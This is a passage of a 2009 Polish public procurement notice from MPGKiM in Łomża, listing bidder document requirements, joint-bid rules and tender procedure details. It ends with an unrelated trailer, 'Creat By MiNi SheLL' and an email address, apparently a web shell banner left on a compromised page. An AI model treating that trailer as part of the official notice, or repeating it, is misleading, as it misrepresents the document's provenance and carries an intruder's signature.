     podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2  ustawy z dnia 29 stycznia 2004 r. 
     Prawo Zamówień Publicznych ( Dz.U. Nr 223, poz.1655 z 2007 r. oraz Dz. U. Nr 171, 
     poz. 1058 z 2008 r. ) - załącznik nr 2; 
3) oświadczenie, że oferowane roboty budowlane,dostawy odpowiadają wymaganiom 
    określonym przez Zamawiającego  - załącznik nr 3;  
4) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
    zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 
    miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w 
    postępowaniu o udzielenie zamówienia albo składania ofert;
5) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,
    że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że wykonawca
    uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
    zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu
    podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania 
    wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo
    składania ofert;
6) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych
    lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio,
    że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i  
    społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  
    rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  
    właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  
    składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
    albo składania ofert;
7) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 
    pkt 4-8 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu  
    składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
    albo składania ofert;  
8) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 
    pkt 9 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania 
    wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
    albo składania ofert;  
9) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem   
      wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności 
      jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie, 
      przebudowie obiektów wraz z infrastrukturą towarzyszącą typu drogi, place sieci i 
      przyłącza o  kubaturze minimum 20.000 m3 i wartości nie mniejszej niż 10,0 mln zł brutto 
      każda z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem 
      dokumentów potwierdzających, że roboty te zostały wykonane należycie ( np. referencje, 
      protokoły odbioru ) - załącznik nr 4;
10) wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia 
      postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności 
      jest krótszy - w tym okresie co najmniej 1 dostawy o wartości nie mniejszej niż 5,0 mln zł 
      brutto, odpowiadającej swoim rodzajem dostawom określonych w punkcie 3 SIWZ punkt 3.2 z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie ( np. referencje, protokoły odbioru ) - załącznik nr 5; 
11) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
      uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
      zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a 
      także zakresu wykonywanych przez nie czynności - załącznik nr 6;   
11a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
      wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 11, Wykonawca 
      wskazał osoby, którymi będzie dysponował.
      Wykaz należy przygotować w oparciu o wymagania Zamawiającego opisane w pkt 5.1 
      ppkt 2 lit. b SIWZ, z wykorzystaniem załącznika nr 6. 
12) wykaz robót, które Wykonawca zamierza zlecić podwykonawcom - załącznik nr 7;
13) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje 
       lub będzie dysponował Wykonawca do realizacji zamówienia ( rodzaj sprzętu, rok 
       produkcji, ilość sztuk, stan własności - załącznik nr 8; 
13a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do 
      wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 13, 
      Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; 
14) informację na temat przeciętnej liczby zatrudnionych pracowników w liczbie co najmniej 
      50 pracowników ( w robotach budowlanych bez pracowników administracji i 
      kierownictwa ) oraz liczebności personelu kierowniczego w ilości co najmniej 5 osób  w 
      okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a w przypadku gdy 
      okres prowadzenia działalności jest krótszy - w tym okresie - wg samodzielnie napisanego załącznika; 
15) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których
      Wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych 
      środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż 8,0 
      mln zł ( słownie: osiem milionów zł ) - wystawioną nie wcześniej niż 3 miesiące przed 
      upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o 
      udzielenie zamówienia  albo składania ofert;  
16) polisę, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 
      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
      gospodarczej na kwotę minimum 5,0 mln zł. ( słownie: pięć milionów złotych ).
      Jeżeli polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony 
      obejmuje okres krótszy niż termin realizacji zamówienia, Wykonawca składa 
      oświadczenie, że w przypadku wyboru jego oferty zobowiązuje się do przedłużenia polisy  
       na cały okres objęty zamówieniem oraz zobowiązuje się do przedkładania kolejnej polisy  
       Zamawiającemu w wypadku zakończenia okresu ubezpieczenia.      
17) oświadczenie Wykonawcy do wniesienia zabezpieczenia i formy należytego wykonania 
      umowy w przypadku uzyskania zamówienia w wysokości 10% ceny całkowitej podanej w 
      ofercie - wg samodzielnie napisanego załącznika;
18) dokument potwierdzający, że Wykonawca posiada certyfikat ISO -9001 lub inny 
      równoważny certyfikat potwierdzający spełnienie przez firmę norm jakościowych w 
      zakresie robót budowlanych;
19) sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego 
      rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o 
      badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych 
      do sporządzania sprawozdania finansowego innych dokumentów określających obroty 
      oraz zobowiązania i należności - za ostatnie trzy lata obrotowe ( 2005-2007 ), a jeżeli 
      okres prowadzenia działalności jest krótszy - za ten okres;   
20) zobowiązanie Wykonawcy w przypadku uzyskania zamówienia do ubezpieczenia budowy 
      i robót na czas trwania kontraktu, na kwotę brutto zaoferowaną w przetargu z tytułu 
      szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz 
      odpowiedzialności cywilnej - wg samodzielnie napisanego załącznika; 
21) oświadczenie o dokonaniu wizji terenu przeznaczonego pod realizację zadania - wg samodzielnie napisanego załącznika;
22) kosztorys ofertowy ( wg załączonych przedmiarów robót );
23) proponowany harmonogram rzeczowo-terminowo-finansowy w układzie miesięcznych 
      przepływów finansowych dla całego trwania kontraktu - według samodzielnie napisanego 
      załącznika. Zamawiający wymaga aby stopień zaawansowania przedsięwzięcia 
      przedstawiony w harmonogramie wynosił: 
 - na dzień 31.12.2009 r. -  25%, 
 - na dzień 15.05.2010 r. -  50%, 
 - na dzień 30.09.2010 r. -100%;
24) oświadczenie o zrealizowaniu zamówienia zgodnie z harmonogramem rzeczowo-
      terminowo- finansowym - wg samodzielnie napisanego załącznika;
25) zaparafowany projekt umowy - załącznik nr 9;
26) dowód wniesienia wadium.

6.1.3 Sprawdzenie wiarygodności oferty z treścią niniejszej SIWZ

1) Zamawiający zastrzega sobie prawo sprawdzania w toku oceny oferty wiarygodności 
    przedstawionych przez Wykonawców dokumentów, oświadczeń, wykazów, danych i 
    informacji.
2) W przypadku stwierdzenia przez Zamawiającego w trakcie sprawdzania ofert, że złożenie 
    oferty stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
    nieuczciwej konkurencji - oferta zostanie przez Zamawiającego odrzucona na podstawie 
    art. 89 ust.1 pkt 3 ustawy Pzp.
3) Przedstawienie przez Wykonawcę informacji nieprawdziwych mających wpływ na wynik 
    postępowania o udzielenie niniejszego zamówienia skutkować będzie wykluczeniem 
    Wykonawcy z prowadzonego postępowania, zgodnie z art. 24 ust. 2 pkt 2 ustawy Pzp, 
    niezależnie od innych skutków przewidzianych prawem.      

6.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( w rozumieniu art. 23 ustawy Pzp ) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do   
    ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 
    zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
    zamówienia publicznego oraz do załączenia do oferty dokumentu pełnomocnictwa 
   ( oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza ). 
   Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty.
2) Pełnomocnika należy wskazać w formularzu ofertowym. 
3) Dokument pełnomocnictwa musi zawierać w szczególności wskazanie:
 a. postępowania o zamówienie publiczne, którego dotyczy;
 b. wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia       
     wymienionych z nazwy z określeniem adresu siedziby;
 c. ustanowionego Pełnomocnika oraz zakres jego umocowania;
4) Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców 
    ubiegających się wspólnie o udzielenie zamówienia, w tym ustanowionego Pełnomocnika.  
    Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli, mające 
    prawo do zaciągania zobowiązań, wyszczególnione w dokumencie rejestracyjnym 
    prowadzonej działalności gospodarczej, w sposób przewidziany w tym dokumencie dla 
    formy reprezentacji tego podmiotu gospodarczego.   
5) W przypadku składania oferty przez Wykonawców występujących wspólnie dokumenty, o 
    których mowa w pkt 6.1.2 ppkt 3,5,6,7,8,9 muszą być złożone osobno przez każdego 
    Wykonawcę. Pozostałe dokumenty będą traktowane jako wspólne. 
6) Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, 
    składa i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu 
    przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich  
    Wykonawców składających ofertę wspólną.
7) Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane  za
    zgodność z oryginałem  i podpisane przez Pełnomocnika.
8) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie
     z Pełnomocnikiem, którego adres wpisano w formularzu ofertowym.
9) Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający
     zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej 
     współpracę tych Wykonawców.

Uwaga:
Do formy i treści dokumentów, składanych przez wykonawców, mających siedzibę lub miejsce zamieszkania za granicą stosuje się odpowiednio § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich dokumenty mogą być składane (Dz. U. z dnia 24 maja  2006r.,Nr 87, poz. 605 i Dz. U. z 2008 r., Nr 87, poz. 605 )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.mpgkim.lomza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MPGKiM ZB
18-400 Łomża
ul. Akademicka 22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 10:00, miejsce: MPGKiM ZB
18-400 Łomża
ul. Akademicka 22
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Infrastruktura i Środowisko 2007-2013

Creat By MiNi SheLL
Email: jattceo@gmail.com